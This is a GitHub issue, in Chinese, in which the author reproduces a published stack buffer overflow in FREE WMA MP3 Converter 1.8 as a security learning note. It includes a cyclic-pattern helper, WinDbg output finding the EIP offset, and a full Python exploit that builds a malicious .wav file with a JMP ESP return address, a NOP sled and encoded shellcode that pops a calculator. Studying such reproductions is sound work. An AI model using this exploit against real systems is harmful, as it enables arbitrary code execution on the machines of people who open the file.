Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

FREE WMA MP3 CONVERTER 1.8缓冲区溢出漏洞复现 #21

Open
xinali opened this issue Mar 27, 2018 · 0 comments
Open

FREE WMA MP3 CONVERTER 1.8缓冲区溢出漏洞复现 #21

xinali opened this issue Mar 27, 2018 · 0 comments
Labels
二进制安全 漏洞复现

Comments

@xinali
Copy link
Owner

xinali commented Mar 27, 2018

FREE WMA MP3 CONVERTER 1.8缓冲区溢出漏洞复现

漏洞概述

漏洞来源exploit-db

首先生成测试字符串

#encoding:utf-8

import sys
from pwnlib.util.cyclic import cyclic, cyclic_find

def usage():
    print """
====================================================
        [*] python genseq.py s/g arg"
        example:
        generate: python genseq.py g 1000
        search: python genseq.py s abcd
====================================================
        """

if __name__ == "__main__":
    if len(sys.argv) < 2:
        usage()
        sys.exit(1)

    op = sys.argv[1]
    try:
        if op == 'g':
            gen_len = sys.argv[2]
            print cyclic(int(gen_len))
        elif op == 's':
            search_ch = sys.argv[2]
            print cyclic_find(search_ch)

    except Exception as ex:
        print ex
        usage()

生成一个10000长度的wav文件,打开CONVERTER,并利用windbg附加

开始转换,程序崩溃

定位漏洞

kb查看调用栈

可以看到调用栈全被数据填充,根据eip定位溢出长度

0:003> .formats(eip)
Evaluate expression:
  Hex:     61657062
  Decimal: 1634037858
  Octal:   14131270142
  Binary:  01100001 01100101 01110000 01100010
  Chars:   aepb
  Time:    Tue Oct 12 04:24:18 2021
  Float:   low 2.64525e+020 high 0
  Double:  8.07322e-315

利用上面的程序寻找一下:

python genseq.py s bpea
4112

可以看到当字符串长度达到4112时即可覆盖eip,程序并没有对传入的字符进行长度检查,所以可以构造shellcode

poc + eip + nops + shellcode

其中poc长度4112,eip地址为搜索到的jmp esp

利用其给出的shellcode测试

import struct
def little_endian(address):
  return struct.pack("<L",address)
poc="\x41" * 4112
eip=little_endian(0x0045CD1A)#0045CD1A   FFE4  JMP ESP
nops="\x90" * 80
shellcode=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
exploit = poc + eip + nops + shellcode
try:
    rst= open("bof_WMA MP3 Converter.wav",'w')
    rst.write(exploit)
    rst.close()
except:
    print "Error"

弹出计算器
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
二进制安全 漏洞复现
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@xinali